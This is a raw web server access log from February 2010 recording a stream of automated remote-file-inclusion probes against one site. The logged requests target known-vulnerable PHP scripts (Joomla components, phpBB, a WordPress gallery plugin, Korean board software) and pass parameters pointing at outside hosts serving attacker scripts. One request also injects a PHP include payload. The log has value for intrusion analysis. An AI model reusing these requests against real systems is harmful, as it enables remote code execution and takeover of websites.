200.93.147.154 - - [19/Feb/2010:06:07:18 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:07:47 -0800] "GET /logs/access_100117.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:07:52 -0800] "GET /logs/access_100207.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:07:52 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:07:52 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:07:53 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:08:00 -0800] "GET /logs/access_100117.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:08:17 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:08:19 -0800] "GET /logs/access_100207.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:08:19 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:08:19 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:08:19 -0800] "GET /logs/access_100114.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:08:19 -0800] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:08:20 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [19/Feb/2010:06:09:13 -0800] "GET /logs/access_100129.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [19/Feb/2010:06:09:13 -0800] "GET /logs/access_100202.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [19/Feb/2010:06:09:13 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [19/Feb/2010:06:09:13 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:09:46 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:09:47 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:10:00 -0800] "GET /stubjambo.php?baseDir=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:10:02 -0800] "GET /logs/access_100126.log%20%20//stubjambo.php?baseDir=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:10:02 -0800] "GET /logs//stubjambo.php?baseDir=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:06:10:20 -0800] "GET /logs/access_100114.log//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:10:34 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:10:41 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:10:41 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:10:48 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:11:19 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:11:19 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:11:19 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:12:00 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:12:00 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:12:00 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:12:10 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:13:15 -0800] "GET /logs/access_100127.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:13:15 -0800] "GET /logs/access_100117.log%20%20//stubjambo.php?baseDir=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:13:41 -0800] "GET /logs/access_100127.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:14:29 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:16:05 -0800] "GET /logs/access_100121.log%20%20//stubjambo.php?baseDir=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:16:05 -0800] "GET /logs//stubjambo.php?baseDir=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:16:32 -0800] "GET /logs/access_100126.log%20%20//stubjambo.php?baseDir=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:18:15 -0800] "GET /bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:18:15 -0800] "GET /logs//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:18:16 -0800] "GET /logs/access.log%20%20//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:18:42 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:18:42 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:18:42 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:18:51 -0800] "GET /logs/access_100202.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:18:59 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:18:59 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:18:59 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:19:01 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:19:01 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:19:01 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:19:01 -0800] "GET /logs//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:19:01 -0800] "GET /logs/access_100129.log%20%20//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:19:01 -0800] "GET /ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:19:03 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:19:03 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:19:04 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:19:16 -0800] "GET /logs/access_100115.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:19:25 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:19:25 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:19:25 -0800] "GET /logs/access_100203.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [19/Feb/2010:06:19:30 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [19/Feb/2010:06:19:31 -0800] "GET /orange_g/forum/viewtopic.php?p=22657 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:17 -0800] "GET /logs/access_100127.log%20%20//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:18 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:18 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:18 -0800] "GET /logs/access_100203.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:26 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:26 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:27 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:37 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:37 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:37 -0800] "GET /logs/access_100206.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:44 -0800] "GET /logs//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:44 -0800] "GET /ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:20:53 -0800] "GET /logs/access_100121.log%20%20//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:21:01 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:21:13 -0800] "GET /logs/access_100118.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:21:19 -0800] "GET /logs/access_100104.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:21:32 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:21:32 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:21:32 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:21:47 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:21:51 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:21:51 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:18 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:18 -0800] "GET /logs/access_100206.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:18 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:20 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:20 -0800] "GET /logs/access_100118.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:20 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:22:21 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:41 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:41 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:22:41 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:23:17 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:23:17 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:23:17 -0800] "GET /logs/access_100118.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.91.240.2 - - [19/Feb/2010:06:23:25 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.91.240.2 - - [19/Feb/2010:06:23:25 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:23:25 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.91.240.2 - - [19/Feb/2010:06:23:26 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
